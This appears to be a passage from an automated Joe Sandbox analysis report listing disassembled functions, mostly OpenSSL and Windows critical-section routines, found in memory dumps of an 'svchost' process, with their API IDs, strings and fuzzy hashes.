                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_write_ex$memcpy
                                                                                              • String ID: \u00
                                                                                              • API String ID: 2000845359-188400610
                                                                                              • Opcode ID: c2f7faf3ad159e8ce584005750ab09050fbed26cbf8b54428de2030e24038d41
                                                                                              • Instruction ID: 5b540e78acf691a8d7696f6ee9eefea050c8cff9df12a42b1cecccc9e73895b0
                                                                                              • Opcode Fuzzy Hash: c2f7faf3ad159e8ce584005750ab09050fbed26cbf8b54428de2030e24038d41
                                                                                              • Instruction Fuzzy Hash: 8C2191B2A09AC193E7258B75E1502ADABA0FB45780F18C175DF9C13BA5CF79E4758300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_dump_indentO_indentO_printf
                                                                                              • String ID: %s (0x%04x)
                                                                                              • API String ID: 2723189173-3351362759
                                                                                              • Opcode ID: 1e846a7a4961b60ab853e2fbc2601ae29c44c3ba9b5bb69f43aee9e5efff950a
                                                                                              • Instruction ID: 6ff82f05c17bc105f03d2e6d0bc71e476a9cc427442285c898564d29adf65dfc
                                                                                              • Opcode Fuzzy Hash: 1e846a7a4961b60ab853e2fbc2601ae29c44c3ba9b5bb69f43aee9e5efff950a
                                                                                              • Instruction Fuzzy Hash: AA1129B2B0E58287EB2A8635E4212FD6B50EB41794F48C031CEAC067A2DE2CD162C700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_dump_indentO_indentO_printf
                                                                                              • String ID: %s (%d)
                                                                                              • API String ID: 2723189173-2206749211
                                                                                              • Opcode ID: 7941ef2ecc73a662dd177bcf290c014e0e210db29d4c5eecc4cb5782006fea4c
                                                                                              • Instruction ID: 88a5ea40c4bf45503b9bc7c73baf79da33cbe15a3dbb68d9351bf563ca436723
                                                                                              • Opcode Fuzzy Hash: 7941ef2ecc73a662dd177bcf290c014e0e210db29d4c5eecc4cb5782006fea4c
                                                                                              • Instruction Fuzzy Hash: 0011E5B2B0E69286EE668A31E0100BA6F51EB45794F44C431CFAD077A5CE3CE1A2CB40
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #
                                                                                              • API String ID: 0-1885708031
                                                                                              • Opcode ID: 755a76a62d667d4964054da24ef3d958c293f51d3ac71132f0fcb928d9ae18d7
                                                                                              • Instruction ID: 39f6fdc8cf59f513e4315df952eb95ac864496b32b48b14bd318c975523214ae
                                                                                              • Opcode Fuzzy Hash: 755a76a62d667d4964054da24ef3d958c293f51d3ac71132f0fcb928d9ae18d7
                                                                                              • Instruction Fuzzy Hash: 151192B2F0A24186FBA68B39D0D83BC2BD1EB40B44F088179CE5C0A6E5CFBD94C48311
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_flagsO_set_flagsR_newR_set_debug
                                                                                              • String ID: $
                                                                                              • API String ID: 4119164335-3993045852
                                                                                              • Opcode ID: e861b635a260d0521812b5d88f94463c3450914c77ecf3551f80ef991edadf37
                                                                                              • Instruction ID: f9e931a3ef84459ff4207ea3f1b2027d8e732f0d4ed09116aec4b18941595528
                                                                                              • Opcode Fuzzy Hash: e861b635a260d0521812b5d88f94463c3450914c77ecf3551f80ef991edadf37
                                                                                              • Instruction Fuzzy Hash: F30152A1A0614586FF66CB79D0C93BC2BD0EB81B54F088075CE5C4A6E5CF7D94C48321
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_flagsO_set_flags
                                                                                              • String ID: 0
                                                                                              • API String ID: 3946675294-4108050209
                                                                                              • Opcode ID: 8bfe953c5c865e6decd360031a0580a611bba00c4d387c5f22279d2639491d50
                                                                                              • Instruction ID: d800cd37f82074d58e802667d148213949f41d3a602398de7266b32113357a92
                                                                                              • Opcode Fuzzy Hash: 8bfe953c5c865e6decd360031a0580a611bba00c4d387c5f22279d2639491d50
                                                                                              • Instruction Fuzzy Hash: 070184B1E0A2464AFF669B39C0C53BD2B91EF81B88F0C8074CE584A6D6DF7D58D58321
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: M_construct_endM_construct_int
                                                                                              • String ID: read_ahead
                                                                                              • API String ID: 984625892-3142057140
                                                                                              • Opcode ID: 88b45bba1c2f1a6a971b24addbbe484a25df95155a7ea383780fe59d83bbd36e
                                                                                              • Instruction ID: 5f8b433d3541990b0d59565ae551c6b100176f0f28831cd8bab3033fbdf9fd7a
                                                                                              • Opcode Fuzzy Hash: 88b45bba1c2f1a6a971b24addbbe484a25df95155a7ea383780fe59d83bbd36e
                                                                                              • Instruction Fuzzy Hash: 9D112E66909BC986E7229F78D0513E9B360FB99748F449231DF9D16626EF38E189CB00
                                                                                              APIs
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,00000000,-00000031,00007FFBAB488692), ref: 00007FFBAB488B1C
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_set_debugR_vset_error
                                                                                              • String ID: ssl\statem\statem.c$write_state_machine
                                                                                              • API String ID: 3681713388-3145639028
                                                                                              • Opcode ID: e7b06f0b829d9ee6c3306deeb4800a49986b91a08856d2242d6c70275ab85e4d
                                                                                              • Instruction ID: ae455170abc1fbbd9e402dcfba20363498548057a039a3c5661bc66bb50fffd2
                                                                                              • Opcode Fuzzy Hash: e7b06f0b829d9ee6c3306deeb4800a49986b91a08856d2242d6c70275ab85e4d
                                                                                              • Instruction Fuzzy Hash: 11F090736197828BE743DB35E8957E83721EB45790F098073CF68436A2EE39D496C341
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_flagsO_set_flags
                                                                                              • String ID: $
                                                                                              • API String ID: 3946675294-3993045852
                                                                                              • Opcode ID: 858479fff8082ae8b39c8b4f6e49fb7cef3cca36a28341a1b00d2c29114c4208
                                                                                              • Instruction ID: 576fb916d0c67bd13f3778cef493756d1a84022fc22e9a66eace23b73876f822
                                                                                              • Opcode Fuzzy Hash: 858479fff8082ae8b39c8b4f6e49fb7cef3cca36a28341a1b00d2c29114c4208
                                                                                              • Instruction Fuzzy Hash: E7F030A1F0724246FFA69A79D4953BD27819B85B44F088078CE5C4B7E6DFBE94C58310
                                                                                              APIs
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,00000000,-00000031,00007FFBAB488692), ref: 00007FFBAB488B1C
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_set_debugR_vset_error
                                                                                              • String ID: ssl\statem\statem.c$write_state_machine
                                                                                              • API String ID: 3681713388-3145639028
                                                                                              • Opcode ID: bb49afc650bbc74ddf2c9596240e7acfbe2fa9fc4754a5b5427dedf954be50b2
                                                                                              • Instruction ID: ca927711d4f1e2a81472a9ecf24bad0248e5a88a6d70f21c3907aacdb427e3ed
                                                                                              • Opcode Fuzzy Hash: bb49afc650bbc74ddf2c9596240e7acfbe2fa9fc4754a5b5427dedf954be50b2
                                                                                              • Instruction Fuzzy Hash: B9F090736197868AE743DB35E4557E82B20FB45754F088477CF68035A3EE39D496C300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_flagsO_set_flags
                                                                                              • String ID: #
                                                                                              • API String ID: 3946675294-1885708031
                                                                                              • Opcode ID: 9edbbc9cf9b2035251af165760b932159eec7fa7c28778bf96a934e8562b0b6d
                                                                                              • Instruction ID: d314a93eeebb98e982a903bc02ead731c5875938149396e066f17548a17b8253
                                                                                              • Opcode Fuzzy Hash: 9edbbc9cf9b2035251af165760b932159eec7fa7c28778bf96a934e8562b0b6d
                                                                                              • Instruction Fuzzy Hash: 2DF0A0A1F0B24246FFA69A75D0953BD2781DB84B44F088078CD5C0BBE6DFBE84C58310
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_flagsO_set_flags
                                                                                              • String ID:
                                                                                              • API String ID: 3946675294-3916222277
                                                                                              • Opcode ID: b51f1b6c0890579b79eb27bf295fe1aa36f5839a817513cc7c0856274dfcc6b4
                                                                                              • Instruction ID: db3dca3aeb582d0cdbf4699ee24346e16a9edba5d1ee2e67a5c2e9d4561f5587
                                                                                              • Opcode Fuzzy Hash: b51f1b6c0890579b79eb27bf295fe1aa36f5839a817513cc7c0856274dfcc6b4
                                                                                              • Instruction Fuzzy Hash: 7FF08CA1F0624246FBA69A79D0953BD27819B84B44F088078CD5C0A7E6DFBD84C58310
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_flagsO_set_flags
                                                                                              • String ID: $
                                                                                              • API String ID: 3946675294-3993045852
                                                                                              • Opcode ID: 858479fff8082ae8b39c8b4f6e49fb7cef3cca36a28341a1b00d2c29114c4208
                                                                                              • Instruction ID: 576fb916d0c67bd13f3778cef493756d1a84022fc22e9a66eace23b73876f822
                                                                                              • Opcode Fuzzy Hash: 858479fff8082ae8b39c8b4f6e49fb7cef3cca36a28341a1b00d2c29114c4208
                                                                                              • Instruction Fuzzy Hash: E7F030A1F0724246FFA69A79D4953BD27819B85B44F088078CE5C4B7E6DFBE94C58310
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_delete
                                                                                              • String ID: ssl\quic\quic_lcidm.c
                                                                                              • API String ID: 3239526987-3923830422
                                                                                              • Opcode ID: 232aafc997d7999e1c6c17a4d80df4341fcd33b7748c27ad3f0d600700aad4e9
                                                                                              • Instruction ID: 2cfef65775d56383acaff7a984f79ba9fe02c1976d8bfbb7a08b41e5e1602b9c
                                                                                              • Opcode Fuzzy Hash: 232aafc997d7999e1c6c17a4d80df4341fcd33b7748c27ad3f0d600700aad4e9
                                                                                              • Instruction Fuzzy Hash: 22E01AD1B4A50681EE21DBA7C89517C6361EB8CFC4F14C432EE1D8B376CE2DD4468310
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32 ref: 6494251B
                                                                                              • LeaveCriticalSection.KERNEL32 ref: 64942544
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                              • String ID:
                                                                                              • API String ID: 3168844106-0
                                                                                              • Opcode ID: 851d171cd28a33aadb92ebce3c595771e2ce9737388f0198247a6dbe2b6ab19b
                                                                                              • Instruction ID: b99e11a6316d0448230eb75c665dd17718beceef0fb6c32023aa6a9d4bb3f6bc
                                                                                              • Opcode Fuzzy Hash: 851d171cd28a33aadb92ebce3c595771e2ce9737388f0198247a6dbe2b6ab19b
                                                                                              • Instruction Fuzzy Hash: 04317F727546408AE704CF39D55079963A5F785BECF188221CE298B398EB34C845CB50
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32 ref: 649423EB
                                                                                              • LeaveCriticalSection.KERNEL32 ref: 64942412
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                              • String ID:
                                                                                              • API String ID: 3168844106-0
                                                                                              • Opcode ID: 6c5c170412acd35b33d122e5247fcd1a708dcfef8aec11af2fc5c19ab33a7a5d
                                                                                              • Instruction ID: f967bd8da5c0fc703b858b5675a139c0871c693ac84ec2db33bbd0f9f2198421
                                                                                              • Opcode Fuzzy Hash: 6c5c170412acd35b33d122e5247fcd1a708dcfef8aec11af2fc5c19ab33a7a5d
                                                                                              • Instruction Fuzzy Hash: 69314B727946008BD704CF39D84038977A5F785FACF588221DE29CA398EB35C596CB51
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(00000120,00000000,00000068,00000000,?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89), ref: 6494219E
                                                                                              • LeaveCriticalSection.KERNEL32(?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89,?,?,?,00000100), ref: 649421B1
                                                                                              • EnterCriticalSection.KERNEL32(?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89,?,?,?,00000100), ref: 649421E5
                                                                                              • LeaveCriticalSection.KERNEL32(?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89,?,?,?,00000100), ref: 649421F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                              • String ID:
                                                                                              • API String ID: 3168844106-0
                                                                                              • Opcode ID: f15036db10595685eebc1814736d955a65ba432477aa49132a02940adeb30443
                                                                                              • Instruction ID: 7a5ad15dbad42ca2a217f772ee4adc9c7e6a81657260e45da0a70067a48174a5
                                                                                              • Opcode Fuzzy Hash: f15036db10595685eebc1814736d955a65ba432477aa49132a02940adeb30443
                                                                                              • Instruction Fuzzy Hash: B8018F237582549EE716DB77EC00B5AA7A4B789FD8F448122EE0983B14EA38C1438B01